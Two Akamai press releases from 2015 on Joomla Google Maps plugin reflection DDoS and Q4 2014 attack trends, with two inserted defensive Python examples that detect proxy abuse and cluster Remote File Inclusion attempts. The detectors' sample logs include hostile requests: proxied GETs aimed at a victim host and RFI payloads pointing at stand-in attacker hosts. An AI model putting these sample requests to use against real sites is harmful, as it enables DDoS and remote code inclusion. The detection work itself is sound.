Kuala Lumpur – February 26, 2015 – Akamai Technologies, Inc. (NASDAQ: AKAM), the leading provider of cloud services for delivering, optimizing and securing online content and business applications, today released, through the company’s Prolexic Security Engineering & Research Team (PLXsert) in collaboration with PhishLabs’ R.A.I.D (Research, Analysis, and Intelligence Division), a new cybersecurity threat advisory. The advisory alerts enterprises and Software-as-a-Service (SaaS) providers of attackers using Joomla servers with a vulnerable Google Maps plugin installed as a platform for launching distributed denial of service (DDoS) attacks. The advisory is available for download from www.stateoftheinternet.com/joomla-reflection.
“Vulnerabilities in web applications hosted by Software-as-a-Service providers continue to provide ammunition for criminal entrepreneurs. Now they are preying on a vulnerable Joomla plugin for which they’ve invented a new DDoS attack and DDoS-for-hire tools,” said Stuart Scholly, senior vice president and general manager, Security Business Unit, Akamai. “This is one more web application vulnerability in a sea of vulnerabilities – with no end in sight. Enterprises need to have a DDoS protection plan in place to mitigate denial of service traffic from the millions of cloud-based SaaS servers that can be used for DDoS.”
Vulnerability in Google Maps plugin for Joomla enables DDoS attacks
A known vulnerability in a Google Maps plugin for Joomla allows the plugin to act as a proxy. A proxy is an intermediary server that processes a request and returns the result on behalf of someone else. The vulnerable Google Maps plugin allows Joomla servers that use it to be used as a proxy. Attackers spoof (fake) the source of the requests, causing the results to be sent from the proxy to someone else – their denial of service target. The true source of the attack remains unknown, because the attack traffic appears to come from the Joomla servers.
With cooperation from PhishLabs’ R.A.I.D, PLXsert matched DDoS signature traffic originating from multiple Joomla sites, which indicates vulnerable installations are being used en masse for reflected GET floods, a type of DDoS attack. Observed attack traffic and data suggest the attack is being offered on known DDoS-for-hire sites.
PLXsert was able to identify more than 150,000 potential Joomla reflectors on the Internet. Although many of the servers appear to have been patched, reconfigured, locked or have had the plugin uninstalled, others remain vulnerable to use in this DDoS attack.
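The proxy abuse described above can be spotted from the Joomla site's own access log: a burst of requests to the plugin's proxy endpoint whose "url" parameter points at one external host the plugin has no business fetching. The following detector is an added example written for this page, not code from the advisory; the endpoint path, the "url" parameter name, the allowed upstream hosts and the log lines are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Assumed (hypothetical) proxy endpoint path and parameter name of the plugin.
PROXY_PATH = "/plugins/content/plugin_googlemap_proxy.php"
# Upstream hosts the plugin is legitimately expected to fetch from (assumption).
ALLOWED_UPSTREAMS = {"maps.google.com", "maps.googleapis.com"}

# Apache combined-format line: source IP, request target of a GET, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) [^"]*" (\d{3})')

# Constructed sample: two sources pushing the proxy toward one external host,
# one legitimate map-API fetch, and one unrelated page hit.
SAMPLE_LOG = (
    '203.0.113.7 - - [12/Nov/2014:10:01:01 +0000] "GET '
    '/plugins/content/plugin_googlemap_proxy.php?url=http://victim.example/ HTTP/1.1" 200 5120 "-" "-"\n'
) * 3 + (
    '198.51.100.9 - - [12/Nov/2014:10:01:02 +0000] "GET '
    '/plugins/content/plugin_googlemap_proxy.php?url=http://victim.example/index.php HTTP/1.1" 200 5120 "-" "-"\n'
) * 2 + (
    '192.0.2.20 - - [12/Nov/2014:10:01:03 +0000] "GET '
    '/plugins/content/plugin_googlemap_proxy.php?url=http://maps.google.com/maps/api/js HTTP/1.1" 200 900 "-" "-"\n'
    '192.0.2.21 - - [12/Nov/2014:10:01:04 +0000] "GET /index.php HTTP/1.1" 200 3000 "-" "-"\n'
)

def proxy_targets(log_text):
    """Map each non-allowlisted host the proxy was asked to fetch -> (hits, requesting IPs)."""
    hits = defaultdict(lambda: [0, set()])
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, request, _status = m.groups()
        parsed = urlparse(request)
        if parsed.path != PROXY_PATH:
            continue
        target = parse_qs(parsed.query).get("url", [None])[0]
        host = urlparse(target).hostname if target else None
        if not host or host in ALLOWED_UPSTREAMS:
            continue
        hits[host][0] += 1
        hits[host][1].add(src)
    return {h: (n, srcs) for h, (n, srcs) in hits.items()}

def flag_reflection(log_text, threshold=5):
    """Hosts this site was made to hit at least `threshold` times through the proxy."""
    return sorted((h, n, len(s)) for h, (n, s) in proxy_targets(log_text).items() if n >= threshold)

if __name__ == "__main__":
    for host, n, nsrc in flag_reflection(SAMPLE_LOG):
        print(f"possible reflection toward {host}: {n} proxied GETs from {nsrc} source IPs")
```

A site operator who sees such a cluster has confirmation the plugin is being used as a reflector and should disable or patch it; the flagged host is the real victim, since the requesting IPs may not be the attacker's.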
Details of a mitigated DDoS attack
PLXsert mitigated a DDoS attack of this type on behalf of an Akamai customer in November. The majority of the top attacking IP addresses originated from Germany. The same IP addresses that participated in this attack have participated in DDoS attacks against other Akamai customers in the industries of hosting, entertainment and consumer goods.
Multi-layered DDoS mitigation protects against reflection DDoS attacks
Reflection-based DDoS attacks of many types are popular at this time. In the fourth quarter of 2014, Akamai’s PLXsert observed that 39 percent of all DDoS attack traffic employed reflection techniques. Reflection DDoS attacks each take advantage of an Internet protocol or application vulnerability that allows DDoS attackers to reflect malicious traffic off a third-party server or device, hiding their identities and amplifying the amount of attack traffic in the process.
Cloud-based DDoS attack mitigation can combat this problem to protect organizations from malicious traffic. Edge-based security and scrubbing centers stop DDoS attack traffic long before it affects a client’s website or data center.
Get the Joomla Reflection DDoS-for-Hire Threat Advisory to learn more
In the advisory, PLXsert shares its analysis and details, including:
- Use of the GET flood in Joomla reflection
- What to look for: Three sample payloads
- Attacks from the DAVOSET DDoS tool
- Attacks from the UFONet DDoS tool
- GET flood requests observed during an attack
- Geographical distribution of source traffic
- Three DDoS mitigation procedures to stop DDoS attacks of this type
A complimentary copy of the threat advisory is available for download at www.stateoftheinternet.com/joomla-reflection.
MALAYSIA (Feb. 17, 2015) – Akamai Technologies, Inc. (NASDAQ: AKAM), the leading provider of cloud services for delivering, optimizing and securing online content and business applications, today announced the availability of the Q4 2014 State of the Internet – Security Report. The report is produced by Akamai’s Prolexic Security Engineering and Research Team (PLXsert), leading professionals in distributed denial of service (DDoS) protection and cloud security services and strategies. This quarter’s report, which provides analysis and insight into the global attack threat landscape including DDoS attacks observed across the PLXrouted network, can be downloaded at www.stateoftheinternet.com/security-report.
“An incredible number of DDoS attacks occurred in the fourth quarter, almost double what we observed in Q4 a year ago,” said John Summers, vice president, Cloud Security Business Unit, Akamai. “Denial of service is a common and active threat to a wide range of enterprises. The DDoS attack traffic was not limited to a single industry, such as online entertainment that made headlines in December. Instead, attacks were spread among a wide variety of industries.”
Akamai also observed a 52 percent increase in average peak bandwidth of DDoS attacks compared to Q4 a year ago. Large packets of unwanted network traffic can quickly sap an enterprise’s ability to respond to legitimate customers, resulting in denial of service outages. Most unprotected sites cannot withstand a typical DDoS attack. As a result, DDoS attacks have become part of the common cybersecurity threatscape that all enterprises with an online presence must anticipate in a risk assessment.
DDoS-for-hire and the rise of reflection and multi-vector attacks
Resourceful DDoS-for-hire booter suites took a low-investment approach by tapping into reflection-based DDoS attacks. Nearly 40 percent of all DDoS attacks used reflection techniques, which rely on Internet protocols that respond with more traffic than they receive and do not require an attacker to gain control over the server or device.
Widespread availability of for-hire DDoS services allowed low-level, non-technical attackers to purchase ready-to-use DDoS services. The expansion of the DDoS-for-hire market also promoted the use of multi-vector campaigns, as the competitive market drove attack innovation. Significantly more multi-vector attacks were observed – 88 percent more than in Q4 2013. More than 44 percent of all attacks used multiple attack vectors.
Changing global distribution of DDoS targets and sources
The timing of DDoS attacks was distributed more evenly in Q4, a DDoS trend that appears to be fueled by an increasing number of targets of greater value in previously underrepresented geographic locations. In addition, geographical sources of malicious traffic have shifted. The United States and China continued as the lead source countries for DDoS traffic, but instead of the Brazil, Russia, India and China (BRIC) bloc that dominated in Q3 2014, Q4 DDoS attack traffic came in large part from the United States, China and Western Europe.
Highlights from the Akamai PLXsert Q4 2014 State of the Internet – Security Report
Compared to Q4 2013
- 57 percent more DDoS attacks
- 52 percent increase in average peak bandwidth
- 77 percent decrease in average peak packets per second
- 51 percent more application layer attacks
- 58 percent more infrastructure layer attacks
- 28 percent increase in average attack duration
- 84 percent more multi-vector attacks
- 200 percent increase in 100+ Gbps attacks (9 vs. 3)
Compared to Q3 2014
- 90 percent more DDoS attacks
- 54 percent decrease in average peak attack bandwidth
- 83 percent decrease in average peak packets per second
- 16 percent more application layer attacks
- 121 percent more infrastructure layer attacks
- 31 percent increase in average attack duration
- 38 percent more multi-vector attacks
- 47 percent fewer 100+ Gbps attacks (9 vs. 17)
A look into botnets
Malware is often used for DDoS botnet expansion. Malware trends – multiplatform, operating system awareness, and destructive malware – are described in the Security Report. In addition, Akamai profiled multiple web application attack botnets using a new analysis technique that takes advantage of data gleaned from the Akamai Intelligent Platform™. The identified botnets were set up to automate the discovery of web application vulnerabilities for Remote File Inclusion (RFI) and Operating System (OS) Command Injection attacks. Akamai researchers profiled the botnets by identifying malicious code resource URLs and payloads that were identical among seemingly unrelated attacks. An attack payload was used to aggregate data and map botnet activity, actors and victim web applications. This profiling technique can help identify more attack sources.
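The profiling technique described above, grouping seemingly unrelated attacks by the identical remote resource URL they try to include, can be reproduced on ordinary WAF event data. This is an added example for this page, not Akamai's own analysis code; the event tuples, the "?page=http://..." RFI shape and the hostnames are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed WAF-style events: (victim_site, source_ip, requested path with query).
# The trailing "?" on the included URL is a common RFI shape, kept here on purpose.
EVENTS = [
    ("shop.example", "203.0.113.5", "/index.php?page=http://bad.example/a.txt?"),
    ("blog.example", "203.0.113.5", "/view.php?inc=http://bad.example/a.txt?"),
    ("news.example", "198.51.100.8", "/index.php?page=http://bad.example/a.txt?"),
    ("shop.example", "192.0.2.33", "/index.php?page=http://other.example/x.php?"),
    ("shop.example", "192.0.2.34", "/catalog.php?id=1"),
]

# A query parameter whose value is an absolute http(s) URL: candidate remote include.
RFI_RE = re.compile(r"=(https?://[^&\s]+)")

def rfi_resource(path):
    """Return the remote resource URL an RFI attempt tries to include, or None."""
    m = RFI_RE.search(path)
    return m.group(1).rstrip("?") if m else None

def profile_botnets(events):
    """Group events by shared remote payload URL; each group is one botnet candidate
    with the source IPs that carried it and the victim sites it was aimed at."""
    groups = defaultdict(lambda: {"sources": set(), "victims": set(), "events": 0})
    for victim, src, path in events:
        url = rfi_resource(path)
        if not url:
            continue  # not an RFI-shaped request, nothing to correlate on
        g = groups[url]
        g["sources"].add(src)
        g["victims"].add(victim)
        g["events"] += 1
    return dict(groups)

if __name__ == "__main__":
    for url, g in profile_botnets(EVENTS).items():
        print(f"{url}: {g['events']} events, {len(g['sources'])} sources, {len(g['victims'])} victims")
```

Two source IPs hitting three different sites with the same payload URL become one cluster, which is the "identical among seemingly unrelated attacks" signal the report uses to attribute activity to a single botnet.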
Mitigation of bots, scrapers and spiders
While denial of service attacks impact site performance significantly, web crawlers can also affect site performance to a lesser degree. The most poorly coded crawlers may even resemble DDoS traffic. Akamai classifies web crawlers based on desirability and impact on site performance. The Security Report provides advice on classifying and mitigating their effects.
Download the report
A complimentary copy of the Akamai PLXsert Q4 2014 State of the Internet – Security Report is available as a free PDF download at www.stateoftheinternet.com/security-report.